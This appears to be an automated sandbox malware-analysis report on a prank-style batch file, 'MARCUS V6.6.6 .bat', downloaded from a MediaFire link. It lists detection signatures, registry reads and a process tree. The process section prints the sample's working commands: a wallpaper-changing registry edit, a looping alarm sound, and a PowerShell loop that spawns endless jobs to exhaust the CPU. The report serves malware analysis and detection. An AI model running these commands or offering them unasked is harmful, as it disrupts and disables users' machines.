Analysis

max time kernel: 154s
max time network: 140s
platform: windows10-2004_x64
resource: win10v2004-20250314-en
resource tags: arch:x64 arch:x86 image:win10v2004-20250314-en locale:en-us os:windows10-2004-x64 system
submitted: 02/05/2025, 10:53

Static task: static1
URLScan task: urlscan1

Behavioral task: behavioral1
Sample: https://www.mediafire.com/file/x2gpxs8tk4fud03/MARCUS+V6.6.6+.bat/file
Resource: win10v2004-20250314-en

Behavioral task: behavioral2
Sample: https://www.mediafire.com/file/x2gpxs8tk4fud03/MARCUS+V6.6.6+.bat/file
Resource: win10ltsc2021-20250410-en

Behavioral task: behavioral3
Sample: https://www.mediafire.com/file/x2gpxs8tk4fud03/MARCUS+V6.6.6+.bat/file
Resource: win11-20250410-en

General

Target: https://www.mediafire.com/file/x2gpxs8tk4fud03/MARCUS+V6.6.6+.bat/file
Malware Config
Signatures
Suspicious use of NtCreateProcessExOtherParentProcess (2 IoCs)
description | pid | Process | procid_target
PID 3800 created 4436 | 3800 | taskmgr.exe | 83
PID 3800 created 4436 | 3800 | taskmgr.exe | 83
Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\Desktop\Wallpaper = "C:\\magnus\\matrix.bmp" | reg.exe
System Network Configuration Discovery: Internet Connection Discovery (1 TTPs, 1 IoCs)
Adversaries may check for Internet connectivity on compromised systems.
pid | Process
4360 | powershell.exe
Checks SCSI registry key(s) (3 TTPs, 6 IoCs)
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
Checks processor information in registry (2 TTPs, 5 IoCs)
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | wermgr.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | wermgr.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | msedge.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | wermgr.exe
Enumerates system info in registry (2 TTPs, 8 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | wermgr.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | wermgr.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Modifies data under HKEY_USERS (2 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133906568095642924" | msedge.exe
Modifies registry class (2 IoCs)
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | msedge.exe
Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-83325578-304917428-1200496059-1000\{ABFFE479-7355-4D5A-8373-56353A111EB3} | msedge.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (23 IoCs)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Suspicious use of FindShellTrayWindow (64 IoCs)
Suspicious use of SendNotifyMessage (64 IoCs)
Suspicious use of WriteProcessMemory (64 IoCs)
Processes

PID 4436: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/x2gpxs8tk4fud03/MARCUS+V6.6.6+.bat/file
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
Child processes of PID 4436:

PID 4852: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2cc,0x2a0,0x2d0,0x2c8,0x2d8,0x7fff2494f208,0x7fff2494f214,0x7fff2494f220

PID 1624: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2240,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:2

PID 468: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1920,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=2348 /prefetch:3

PID 5024: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2616,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=2696 /prefetch:8

PID 184: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3452,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=3548 /prefetch:1

PID 2100: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3480,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=3536 /prefetch:1

PID 5104: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4248,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=4256 /prefetch:1

PID 4340: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4312,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=4292 /prefetch:2

PID 4200: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5128,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=5088 /prefetch:8

PID 3224: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5380,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=5388 /prefetch:8

PID 3940: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=6088,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6072 /prefetch:1

PID 4296: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5160,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=5928 /prefetch:8

PID 4220: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5936,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=5924 /prefetch:8

PID 968: "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6256,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6272 /prefetch:8

PID 3324: "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6256,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6272 /prefetch:8

PID 4164: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6484,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6508 /prefetch:8

PID 1668: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6516,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6544 /prefetch:8

PID 4928: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6912,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6392 /prefetch:8

PID 2032: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6540,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6692 /prefetch:8

PID 1264: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6536,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6680 /prefetch:8

PID 1144: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6588,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6720 /prefetch:8

PID 3568: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7244,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7252 /prefetch:8

PID 888: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7240,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6668 /prefetch:8

PID 5636: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --always-read-main-dll --field-trial-handle=4268,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=4252 /prefetch:1

PID 5996: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --always-read-main-dll --field-trial-handle=6732,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7060 /prefetch:1

PID 6016: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=4380,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6836 /prefetch:1

PID 4204: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=7352,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7292 /prefetch:1

PID 2600: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=7120,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6808 /prefetch:1

PID 2292: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=7416,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6608 /prefetch:1

PID 5184: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=7568,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7504 /prefetch:1

PID 5572: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=7196,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6888 /prefetch:1

PID 4948: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --always-read-main-dll --field-trial-handle=7176,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7220 /prefetch:1

PID 5864: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4340,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=3684 /prefetch:8

PID 5872: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=4232,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7744 /prefetch:1
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8108,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=8120 /prefetch:82⤵PID:5888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=4276,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=3468 /prefetch:12⤵PID:5124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=7728,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=8008 /prefetch:12⤵PID:6084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=8232,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=8240 /prefetch:12⤵PID:5892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4504,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6668 /prefetch:82⤵PID:5224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4540,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=4556 /prefetch:82⤵PID:5064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7684,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=4324 /prefetch:82⤵PID:3172
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7732,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7948 /prefetch:82⤵PID:6428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:3232
-
C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:5344
C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat"
  PID:5104
    C:\Windows\system32\chcp.com
      chcp 1250
      PID:5424
    C:\Windows\system32\mode.com
      mode 85,30
      PID:5700
    C:\Windows\system32\wscript.exe
      wscript.exe "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat?.WSF//Job:Nyan"
      PID:876
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -c "(New-Object Media.SoundPlayer 'C:\Windows\Media\alarm.mp3').PlayLooping()"
      - System Network Configuration Discovery: Internet Connection Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID:4360
    C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\magnus\matrix.bmp" /f
      - Sets desktop wallpaper using registry
      PID:3120
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -c "while(1) { Start-Job -ScriptBlock { while(1) { [Math]::Pow([Math]::PI, [Math]::E) } } }"
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID:3968
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID:5600
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID:5168
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID:6088
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID:5216
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:5192
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:4452
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:5164
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:5416
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:1620
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:5428
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:5992
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:6204
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:6328
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:6464
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          - Command and Scripting Interpreter: PowerShell
          - Suspicious use of AdjustPrivilegeToken
          PID:6588
